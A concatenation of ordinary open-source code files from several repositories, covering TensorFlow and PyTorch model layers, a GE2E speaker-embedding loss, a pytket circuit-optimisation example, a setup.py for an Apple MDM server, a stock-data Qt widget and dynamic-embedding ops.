self.assertTrue(self.comp[0] == (self.comp[0]))
self.assertFalse(self.comp[0] == (self.comp[1]))
self.assertFalse(self.comp[0] != (self.comp[0]))
self.assertTrue(self.comp[0] != (self.comp[1]))
def test_mul(self):
self.assertEqual(
(self.comp[1] * 4).formula,
"Mn4 O16 -4",
"Incorrect composition after addition!",
)
def test_len(self):
self.assertEqual(len(self.comp[1]), 2, "Lengths are not equal!")
def test_to_string(self):
self.assertEqual(self.comp[1].to_latex_string(), "Mn$_{1}$ O$_{4}$$^{-1}$")
if __name__ == "__main__":
unittest.main()
|
src/mnist/ops.py
|
val-iisc/deligan
| 117 |
67807
|
import numpy as np
import tensorflow as tf
class batch_norm(object):
"""Code modification of http://stackoverflow.com/a/33950177"""
def __init__(self, epsilon=1e-5, momentum = 0.9, name="batch_norm"):
with tf.variable_scope(name):
self.epsilon = epsilon
self.momentum = momentum
self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)
self.name = name
def __call__(self, x, train=True):
shape = x.get_shape().as_list()
if train:
with tf.variable_scope(self.name) as scope:
self.beta = tf.get_variable("beta", [shape[-1]],
initializer=tf.constant_initializer(0.))
self.gamma = tf.get_variable("gamma", [shape[-1]],
initializer=tf.random_normal_initializer(1., 0.02))
batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name='moments')
ema_apply_op = self.ema.apply([batch_mean, batch_var])
self.ema_mean, self.ema_var = self.ema.average(batch_mean), self.ema.average(batch_var)
with tf.control_dependencies([ema_apply_op]):
mean, var = tf.identity(batch_mean), tf.identity(batch_var)
else:
mean, var = self.ema_mean, self.ema_var
normed = tf.nn.batch_norm_with_global_normalization(
x, mean, var, self.beta, self.gamma, self.epsilon, scale_after_normalization=True)
return normed
# standard convolution layer
def conv2d(x, filter_size, stride, inputFeatures, outputFeatures, name):
with tf.variable_scope(name):
w = tf.get_variable("w",[filter_size,filter_size,inputFeatures, outputFeatures], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputFeatures], initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(x, w, strides=[1,stride,stride,1], padding="SAME") + b
return conv
def conv_transpose(x, filter_size, stride, outputShape, name):
with tf.variable_scope(name):
# h, w, out, in
w = tf.get_variable("w",[filter_size,filter_size, outputShape[-1], x.get_shape()[-1]], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputShape[-1]], initializer=tf.constant_initializer(0.0))
convt = tf.nn.conv2d_transpose(x, w, output_shape=outputShape, strides=[1,stride,stride,1])
return convt
# leaky reLu unit
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# fully-connected layer
def dense(x, inputFeatures, outputFeatures, scope=None, with_w=False):
with tf.variable_scope(scope or "Linear"):
matrix = tf.get_variable("Matrix", [inputFeatures, outputFeatures], tf.float32, tf.random_normal_initializer(stddev=0.02))
bias = tf.get_variable("bias", [outputFeatures], initializer=tf.constant_initializer(0.0))
if with_w:
return tf.matmul(x, matrix) + bias, matrix, bias
else:
return tf.matmul(x, matrix) + bias
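# Hedged usage sketch (TF 1.x graph mode; the tensor shapes and layer names below are
# invented for illustration and are not part of this module):
#     x  = tf.placeholder(tf.float32, [64, 28, 28, 1])
#     h1 = lrelu(conv2d(x, 5, 2, 1, 16, name="conv1"))               # -> [64, 14, 14, 16]
#     h2 = dense(tf.reshape(h1, [64, -1]), 14 * 14 * 16, 10, scope="fc1")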
|
setup.py
|
gekco/commandment
| 138 |
67815
|
from setuptools import setup, find_packages
setup(
name="commandment",
version="0.1",
description="Commandment is an Open Source Apple MDM server with support for managing iOS and macOS devices",
packages=['commandment'],
include_package_data=True,
author="mosen",
license="MIT",
url="https://github.com/cmdmnt/commandment",
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
keywords='MDM',
install_requires=[
'acme==0.34.2',
'alembic==1.0.10',
'apns2-client==0.5.4',
'asn1crypto==0.24.0',
'authlib==0.11',
'biplist==1.0.3',
'blinker>=1.4',
'cryptography==2.6.1',
'flask==1.0.3',
'flask-alembic==2.0.1',
'flask-cors==3.0.4',
'flask-jwt==0.3.2',
'flask-marshmallow==0.10.1',
'flask-rest-jsonapi==0.29.0',
'flask-sqlalchemy==2.4.0',
'marshmallow==2.18.0',
'marshmallow-enum==1.4.1',
'marshmallow-jsonapi==0.21.0',
'marshmallow-sqlalchemy==0.16.3',
'oscrypto==0.19.1',
'passlib==1.7.1',
'requests==2.22.0',
'semver',
'sqlalchemy==1.3.3',
'typing==3.6.4'
],
python_requires='>=3.6',
tests_require=[
'factory-boy==2.10.0',
'faker==0.8.10',
'mock==2.0.0',
'mypy==0.560',
'pytest==3.4.0',
'pytest-runner==3.0'
],
extras_require={
'ReST': [
'sphinx-rtd-theme',
'guzzle-sphinx-theme',
'sadisplay==0.4.8',
'sphinx==1.7.0b2',
'sphinxcontrib-httpdomain==1.6.0',
'sphinxcontrib-napoleon==0.6.1',
'sphinxcontrib-plantuml==0.10',
],
'macOS': [
'pyobjc'
]
},
setup_requires=['pytest-runner'],
entry_points={
'console_scripts': [
'commandment=commandment.cli:server',
'appmanifest=commandment.pkg.appmanifest:main',
]
},
zip_safe=False
)
|
examples/python/contextual_optimization.py
|
CQCL/pytket
| 249 |
67824
|
# # Contextual optimisation
# This notebook will illustrate the techniques of "contextual optimisation" available in TKET.
# See the user manual for an introduction to the concept and methods. Here we will present an example showing how we can save some gates at the beginning and end of a circuit, making no assumptions about the structure of the circuit.
# We will take as an example an ansatz circuit consisting of alternating layers of Ry and CX gates, where some proportion of the Ry angles are zero. This is a typical ansatz for variational algorithms, used for solving diagonal Hamiltonians for combinatorial optimisation.
from pytket.circuit import Circuit
from random import random, randrange, seed
def random_sparse_ansatz(n_qubits, n_layers, p, rng_seed=None):
seed(rng_seed)
circ = Circuit(n_qubits)
for q in range(n_qubits):
if random() < p:
circ.Ry(0.1 * randrange(20), q)
for l in range(n_layers):
for q in range(0, n_qubits - 1, 2):
circ.CX(q, q + 1)
for q in range(2 * (n_qubits // 2)):
if random() < p:
circ.Ry(0.1 * randrange(20), q)
for q in range(1, n_qubits - 1, 2):
circ.CX(q, q + 1)
for q in range(2 * ((n_qubits - 1) // 2)):
if random() < p:
circ.Ry(0.1 * randrange(20), q + 1)
circ.measure_all()
return circ
# Let's examine a smallish example:
from pytket.circuit import OpType
from pytket.circuit.display import render_circuit_jupyter
c = random_sparse_ansatz(4, 3, 0.5, rng_seed=0)
render_circuit_jupyter(c)
print("Number of CX:", c.n_gates_of_type(OpType.CX))
# Contextual optimisations allow us to shave some gates from the beginning and end of the circuit. Those at the end get commuted through the Measure gates into a classical post-processing circuit, which we can then pass to `BackendResult` methods to have the postprocessing performed automatically.
# The `prepare_circuit()` method returns a pair of circuits, the first of which is what we actually run and the second of which specifies the required postprocessing.
from pytket.utils import prepare_circuit
c0, ppcirc = prepare_circuit(c)
render_circuit_jupyter(c0)
print("Number of CX:", c0.n_gates_of_type(OpType.CX))
# In this case, one CX has been shaved from the beginning of the circuit and two from the end.
# We can run the processed circuit on our backend:
from pytket.extensions.qiskit import AerBackend
b = AerBackend()
b.compile_circuit(c0)
h = b.process_circuit(c0, n_shots=10)
r = b.get_result(h)
# And finally get the counts or shots, accounting for the classical postprocessing:
counts = r.get_counts(ppcirc=ppcirc)
print(counts)
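# For comparison (an illustrative extra step, not in the original notebook), we can also retrieve the raw counts without applying the classical postprocessing; these may differ from the corrected counts whenever gates were commuted past the measurements:
raw_counts = r.get_counts()
print(raw_counts)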
# See the [pytket user manual](https://cqcl.github.io/pytket/manual/manual_compiler.html#contextual-optimisations) for more details about contextual optimisations and how to apply them in TKET.
|
pytorch_toolkit/face_recognition/model/blocks/mobilenet_v2_blocks.py
|
AnastasiaaSenina/openvino_training_extensions
| 158 |
67867
|
<filename>pytorch_toolkit/face_recognition/model/blocks/mobilenet_v2_blocks.py
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import torch.nn as nn
from model.blocks.shared_blocks import SELayer
class InvertedResidual(nn.Module):
"""Implementation of the modified Inverted residual block"""
def __init__(self, in_channels, out_channels, stride, expand_ratio, outp_size=None):
super(InvertedResidual, self).__init__()
self.stride = stride
assert stride in [1, 2]
self.use_res_connect = self.stride == 1 and in_channels == out_channels
self.inv_block = nn.Sequential(
nn.Conv2d(in_channels, in_channels * expand_ratio, 1, 1, 0, bias=False),
nn.BatchNorm2d(in_channels * expand_ratio),
nn.PReLU(),
nn.Conv2d(in_channels * expand_ratio, in_channels * expand_ratio, 3, stride, 1,
groups=in_channels * expand_ratio, bias=False),
nn.BatchNorm2d(in_channels * expand_ratio),
nn.PReLU(),
nn.Conv2d(in_channels * expand_ratio, out_channels, 1, 1, 0, bias=False),
nn.BatchNorm2d(out_channels),
SELayer(out_channels, 8, nn.PReLU, outp_size)
)
def forward(self, x):
if self.use_res_connect:
return x + self.inv_block(x)
return self.inv_block(x)
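# --- Usage sketch (illustrative addition, not part of the original file) ---
# Builds one block and runs a dummy forward pass. The channel counts, spatial
# size and outp_size value are arbitrary example choices, and outp_size is
# assumed to be whatever SELayer expects in this repository.
if __name__ == "__main__":
    import torch
    block = InvertedResidual(in_channels=32, out_channels=32, stride=1,
                             expand_ratio=2, outp_size=(56, 56))
    x = torch.randn(1, 32, 56, 56)
    y = block(x)  # the residual connection is used since stride == 1 and channels match
    print(y.shape)  # expected: torch.Size([1, 32, 56, 56])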
|
s3prl/downstream/voxceleb2_ge2e/model.py
|
hhhaaahhhaa/s3prl
| 856 |
67873
|
<filename>s3prl/downstream/voxceleb2_ge2e/model.py
# -*- coding: utf-8 -*- #
"""*********************************************************************************************"""
# FileName [ model.py ]
# Synopsis [ the linear model ]
# Author [ S3PRL ]
# Copyright [ Copyleft(c), Speech Lab, NTU, Taiwan ]
"""*********************************************************************************************"""
###############
# IMPORTATION #
###############
import torch
import torch.nn as nn
import torch.nn.functional as F
from functools import lru_cache
from argparse import Namespace
from s3prl.upstream.mockingjay.model import TransformerEncoder
#########
# MODEL #
#########
class Identity(nn.Module):
def __init__(self, config, **kwargs):
super(Identity, self).__init__()
# simply pass pretrained vector
def forward(self, feature, att_mask, head_mask, **kwargs):
return [feature]
class Mean(nn.Module):
def __init__(self, out_dim):
super(Mean, self).__init__()
self.act_fn = nn.Tanh()
self.linear = nn.Linear(out_dim, out_dim)
# simply take mean operator / no additional parameters
def forward(self, feature, att_mask):
'''
        we use one hidden layer and apply mean pooling at the end to generate the utterance-level representation
Arguments
feature - [BxTxD] Acoustic feature with shape
att_mask - [BxTx1] Attention Mask logits
'''
feature=self.linear(self.act_fn(feature))
agg_vec_list = []
for i in range(len(feature)):
if torch.nonzero(att_mask[i] < 0, as_tuple=False).size(0) == 0:
length = len(feature[i])
else:
length = torch.nonzero(att_mask[i] < 0, as_tuple=False)[0] + 1
agg_vec=torch.mean(feature[i][:length], dim=0)
agg_vec_list.append(agg_vec)
return torch.stack(agg_vec_list)
class SAP(nn.Module):
    ''' Self-attention pooling module that incorporates an attention mask '''
def __init__(self, out_dim):
super(SAP, self).__init__()
# Setup
self.act_fn = nn.Tanh()
self.sap_layer = SelfAttentionPooling(out_dim)
def forward(self, feature, att_mask):
'''
Arguments
feature - [BxTxD] Acoustic feature with shape
att_mask - [BxTx1] Attention Mask logits
'''
#Encode
feature = self.act_fn(feature)
sap_vec = self.sap_layer(feature, att_mask)
return sap_vec
class SelfAttentionPooling(nn.Module):
"""
Implementation of SelfAttentionPooling
Original Paper: Self-Attention Encoding and Pooling for Speaker Recognition
https://arxiv.org/pdf/2008.01077v1.pdf
"""
def __init__(self, input_dim):
super(SelfAttentionPooling, self).__init__()
self.W = nn.Linear(input_dim, 1)
self.softmax = nn.functional.softmax
def forward(self, batch_rep, att_mask):
"""
input:
batch_rep : size (N, T, H), N: batch size, T: sequence length, H: Hidden dimension
attention_weight:
att_w : size (N, T, 1)
return:
utter_rep: size (N, H)
"""
seq_len = batch_rep.shape[1]
att_logits = self.W(batch_rep).squeeze(-1)
att_logits = att_mask + att_logits
att_w = self.softmax(att_logits, dim=-1).unsqueeze(-1)
utter_rep = torch.sum(batch_rep * att_w, dim=1)
return utter_rep
class Model(nn.Module):
def __init__(self, input_dim, agg_module, config):
super(Model, self).__init__()
# agg_module: current support [ "SAP", "Mean" ]
# init attributes
self.agg_method = eval(agg_module)(input_dim)
self.model= eval(config['module'])(config=Namespace(**config['hparams']),)
self.head_mask = [None] * config['hparams']['num_hidden_layers']
def forward(self, features, att_mask):
features = self.model(features,att_mask[:,None,None], head_mask=self.head_mask, output_all_encoded_layers=False)
utterance_vector = self.agg_method(features[0], att_mask)
return utterance_vector
class GE2E(nn.Module):
"""Implementation of the GE2E loss in https://arxiv.org/abs/1710.10467 [1]
Accepts an input of size (N, M, D)
where N is the number of speakers in the batch,
M is the number of utterances per speaker,
and D is the dimensionality of the embedding vector (e.g. d-vector)
Args:
- init_w (float): the initial value of w in Equation (5) of [1]
- init_b (float): the initial value of b in Equation (5) of [1]
"""
def __init__(self, init_w=10.0, init_b=-5.0, loss_method='softmax'):
super(GE2E, self).__init__()
self.w = nn.Parameter(torch.tensor(init_w))
self.b = nn.Parameter(torch.tensor(init_b))
self.loss_method = loss_method
assert self.loss_method in ['softmax', 'contrast']
if self.loss_method == 'softmax':
self.embed_loss = self.embed_loss_softmax
if self.loss_method == 'contrast':
self.embed_loss = self.embed_loss_contrast
def cosine_similarity(self, dvecs):
"""Calculate cosine similarity matrix of shape (N, M, N)."""
n_spkr, n_uttr, d_embd = dvecs.size()
dvec_expns = dvecs.unsqueeze(-1).expand(n_spkr, n_uttr, d_embd, n_spkr)
dvec_expns = dvec_expns.transpose(2, 3)
ctrds = dvecs.mean(dim=1).to(dvecs.device)
ctrd_expns = ctrds.unsqueeze(0).expand(n_spkr * n_uttr, n_spkr, d_embd)
ctrd_expns = ctrd_expns.reshape(-1, d_embd)
dvec_rolls = torch.cat([dvecs[:, 1:, :], dvecs[:, :-1, :]], dim=1)
dvec_excls = dvec_rolls.unfold(1, n_uttr-1, 1)
mean_excls = dvec_excls.mean(dim=-1).reshape(-1, d_embd)
indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
ctrd_excls = ctrd_expns.index_copy(0, indices, mean_excls)
ctrd_excls = ctrd_excls.view_as(dvec_expns)
return F.cosine_similarity(dvec_expns, ctrd_excls, 3, 1e-9)
def embed_loss_softmax(self, dvecs, cos_sim_matrix):
"""Calculate the loss on each embedding by taking softmax."""
n_spkr, n_uttr, _ = dvecs.size()
indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
losses = -F.log_softmax(cos_sim_matrix, 2)
return losses.flatten().index_select(0, indices).view(n_spkr, n_uttr)
def embed_loss_contrast(self, dvecs, cos_sim_matrix):
"""Calculate the loss on each embedding by contrast loss."""
N, M, _ = dvecs.shape
L = []
for j in range(N):
L_row = []
for i in range(M):
centroids_sigmoids = torch.sigmoid(cos_sim_matrix[j, i])
excl_centroids_sigmoids = torch.cat(
(centroids_sigmoids[:j], centroids_sigmoids[j+1:]))
L_row.append(1. - torch.sigmoid(cos_sim_matrix[j, i, j]) +
torch.max(excl_centroids_sigmoids))
L_row = torch.stack(L_row)
L.append(L_row)
return torch.stack(L)
def forward(self, dvecs):
"""Calculate the GE2E loss for an input of dimensions (N, M, D)."""
cos_sim_matrix = self.cosine_similarity(dvecs)
        # torch.clamp is not in-place; keep the clamped value so the scaling w stays positive
        w = torch.clamp(self.w, min=1e-9)
        cos_sim_matrix = cos_sim_matrix * w + self.b
L = self.embed_loss(dvecs, cos_sim_matrix)
return L.sum()
@lru_cache(maxsize=5)
def _indices_to_replace(n_spkr, n_uttr):
indices = [(s * n_uttr + u) * n_spkr + s
for s in range(n_spkr) for u in range(n_uttr)]
return torch.LongTensor(indices)
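# --- Usage sketch (illustrative addition, not part of the original file) ---
# Computes the GE2E loss on random d-vectors for N=4 speakers with M=5
# utterances each and embedding size D=256; in training, dvecs would come
# from the speaker model above rather than torch.randn.
if __name__ == "__main__":
    dvecs = torch.randn(4, 5, 256, requires_grad=True)
    criterion = GE2E(loss_method='softmax')
    loss = criterion(dvecs)
    loss.backward()
    print(loss.item())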
|
Stock/Common/Ui/Deal/Basic/DyStockDealDetailsWidget.py
|
Leonardo-YXH/DevilYuan
| 135 |
67905
|
<gh_stars>100-1000
from DyCommon.Ui.DyStatsTableWidget import *
class DyStockDealDetailsWidget(DyStatsTableWidget):
colNames = ['时间', '价格', '成交量(手)', '类型']
def __init__(self, dataEngine):
super().__init__(None, True, False, autoScroll=False)
self._ticksEngine = dataEngine.ticksEngine
self._daysEngine = dataEngine.daysEngine
self.setColNames(self.colNames + ['换手(万分之)'])
def setInfoWidget(self, widget):
self._infoWidget = widget
def set(self, code, date, n = 0):
date = self._daysEngine.codeTDayOffset(code, date, n)
if date is None: return
self._code = code
self._day = date
if not self._ticksEngine.loadCode(code, date):
return
df = self._ticksEngine.getDataFrame(code)
self._set(df)
def getForegroundOverride(self, value):
if value == '买盘':
color = Qt.red
elif value == '卖盘':
color = Qt.darkGreen
else:
color = None
return color
def _set(self, df):
df.drop('amount', axis=1, inplace=True)
        df.reset_index(inplace=True) # convert the time index into a regular column
df[['datetime']] = df['datetime'].map(lambda x: x.strftime('%H:%M:%S'))
df.rename(columns={'datetime':'时间', 'price':'价格', 'volume':'成交量(手)', 'type':'类型'}, inplace=True)
        df = df.reindex(columns=self.colNames)  # reindex returns a new DataFrame, so keep the result
        # compute the per-trade turnover ratio (in units of 1/10000)
volumeSeries = df['成交量(手)']
volumeSum = volumeSeries.sum()
df['换手(万分之)'] = volumeSeries * ((self._infoWidget.turn*100)/volumeSum)
rows = df.values.tolist()
self.fastAppendRows(rows, '类型', True)
def forward(self):
self.set(self._code, self._day, -1)
def backward(self):
self.set(self._code, self._day, 1)
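# --- Illustrative sketch (not part of the original file) ---
# Shows the per-trade turnover scaling used in _set() on a toy DataFrame,
# assuming `turn` is the day's turnover in percent (the widget reads it from
# self._infoWidget.turn).
if __name__ == "__main__":
    import pandas as pd
    toy = pd.DataFrame({'成交量(手)': [120, 80, 200]})
    turn = 1.5  # day's turnover in percent (assumed value for the example)
    toy['换手(万分之)'] = toy['成交量(手)'] * ((turn * 100) / toy['成交量(手)'].sum())
    print(toy)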
|
research/carls/dynamic_embedding_ops.py
|
srihari-humbarwadi/neural-structured-learning
| 939 |
67911
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DynamicEmbedding related ops."""
import typing
from research.carls import context
from research.carls import dynamic_embedding_config_pb2 as de_config_pb2
from research.carls.kernels import gen_carls_ops
import tensorflow as tf
class DynamicEmbeddingLookup(tf.keras.layers.Layer):
"""A Keras Layer for Dynamic Embedding Lookup.
This is useful when the gradient descent update is required for embedding
  lookup. The input of this layer is a `Tensor` of string keys, and it outputs
  the corresponding embeddings as a float `Tensor`.
"""
def __init__(self,
config: de_config_pb2.DynamicEmbeddingConfig,
var_name: typing.Text,
service_address: typing.Text = "",
timeout_ms: int = -1):
"""Constructor for DynamicEmbeddingLookup.
Args:
config: A DynamicEmbeddingConfig proto that configures the embedding.
var_name: A unique name for the given embedding.
service_address: The address of a knowledge bank service. If empty, the
value passed from --kbs_address (defined in
.../carls/dynamic_embedding_manager.cc) flag will be used instead.
      timeout_ms: Timeout in milliseconds for the connection. If negative, never
        time out.
Raises:
ValueError: if var_name is `None` or empty.
"""
super(DynamicEmbeddingLookup, self).__init__()
if not var_name:
raise ValueError("Must specify a non-empty var_name.")
self.embedding_dimension = config.embedding_dimension
context.add_to_collection(var_name, config)
self.resource = gen_carls_ops.dynamic_embedding_manager_resource(
config.SerializeToString(), var_name, service_address, timeout_ms)
def build(self, input_shape):
del input_shape # Not used.
# Creates a placeholder variable for the dynamic_embedding_lookup() such
# that the gradients can be passed into _dynamic_embedding_lookup_grad().
self.grad_placeholder = self.add_weight(
name="grad_placeholder",
shape=[1],
dtype=tf.float32,
trainable=True,
initializer=tf.keras.initializers.zeros)
def call(self, keys):
return gen_carls_ops.dynamic_embedding_lookup(keys, self.grad_placeholder,
self.resource,
self.embedding_dimension)
def dynamic_embedding_lookup(keys: tf.Tensor,
config: de_config_pb2.DynamicEmbeddingConfig,
var_name: typing.Text,
service_address: typing.Text = "",
skip_gradient_update: bool = False,
timeout_ms: int = -1) -> tf.Tensor:
"""Returns the embeddings of from given keys.
Args:
keys: A string `Tensor` of shape [batch_size] or [batch_size,
max_sequence_length] where an empty string would be mapped to an all zero
embedding.
config: A DynamicEmbeddingConfig proto that configures the embedding.
var_name: A unique name for the given embedding.
service_address: The address of a knowledge bank service. If empty, the
value passed from --kbs_address flag will be used instead.
skip_gradient_update: A boolean indicating if gradient update is needed.
    timeout_ms: Timeout in milliseconds for the connection. If negative, never
      time out.
Returns:
    A `Tensor` with one of the following shapes:
- [batch_size, config.embedding_dimension] if the input Tensor is 1D, or
- [batch_size, max_sequence_length, config.embedding_dimension] if the
input is 2D.
Raises:
ValueError: If name is not specified.
"""
if not var_name:
raise ValueError("Must specify a valid var_name.")
  # If skip_gradient_update is true, create a dummy constant so that no
  # gradient update is applied; otherwise create a variable so the
  # gradients can be passed in.
if skip_gradient_update:
grad_placeholder = tf.constant(0.0)
else:
grad_placeholder = tf.Variable(0.0)
context.add_to_collection(var_name, config)
resource = gen_carls_ops.dynamic_embedding_manager_resource(
config.SerializeToString(), var_name, service_address, timeout_ms)
return gen_carls_ops.dynamic_embedding_lookup(keys, grad_placeholder,
resource,
config.embedding_dimension)
def dynamic_embedding_update(keys: tf.Tensor,
values: tf.Tensor,
config: de_config_pb2.DynamicEmbeddingConfig,
var_name: typing.Text,
service_address: typing.Text = "",
timeout_ms: int = -1):
"""Updates the embeddings of given keys with given values.
Args:
    keys: A string `Tensor` of shape [batch_size] or [batch_size,
max_sequence_length].
values: A `Tensor` of shape [batch_size, embedding_dimension] or
[batch_size, max_sequence_length, embedding_dimension].
config: A DynamicEmbeddingConfig proto that configures the embedding.
var_name: A unique name for the given embedding.
service_address: The address of a dynamic embedding service. If empty, the
value passed from --kbs_address flag will be used instead.
    timeout_ms: Timeout in milliseconds for the connection. If negative, never
      time out.
Returns:
    A `Tensor` with one of the following shapes:
- [batch_size, config.embedding_dimension] if the input Tensor is 1D, or
- [batch_size, max_sequence_length, config.embedding_dimension] if the
input is 2D.
Raises:
TypeError: If var_name is not specified.
"""
if not var_name:
raise TypeError("Must specify a valid var_name.")
context.add_to_collection(var_name, config)
resource = gen_carls_ops.dynamic_embedding_manager_resource(
config.SerializeToString(), var_name, service_address, timeout_ms)
return gen_carls_ops.dynamic_embedding_update(keys, values, resource,
config.embedding_dimension)
@tf.RegisterGradient("DynamicEmbeddingLookup")
def _dynamic_embedding_lookup_grad(op, grad):
"""The gradient for DynamicEmbeddingLookup.
Args:
op: The gen_de_op.dynamic_embedding_lookup() op.
grad: The tensor representing the gradient w.r.t. the output of the
gen_de_op.dynamic_embedding_lookup() op.
Returns:
The gradients w.r.t. the input of the gen_de_op.dynamic_embedding_lookup()
op.
"""
grad = tf.reshape(grad, [-1, grad.shape[-1]])
return gen_carls_ops.dynamic_embedding_lookup_grad(
op.inputs[0], # keys
grad,
op.inputs[2] # resource
)
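# --- Usage sketch (illustrative addition, not part of the original file) ---
# Looks up the embeddings of two string keys with the Keras layer above. This
# assumes a knowledge bank service is reachable (via --kbs_address or the
# service_address argument) and that setting embedding_dimension alone yields a
# valid DynamicEmbeddingConfig in this build; treat it as a sketch, not a test.
if __name__ == "__main__":
    config = de_config_pb2.DynamicEmbeddingConfig()
    config.embedding_dimension = 8
    layer = DynamicEmbeddingLookup(config, var_name="demo_embedding")
    keys = tf.constant(["hello", "world"])
    embeddings = layer(keys)  # expected shape: [2, 8]
    print(embeddings)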
|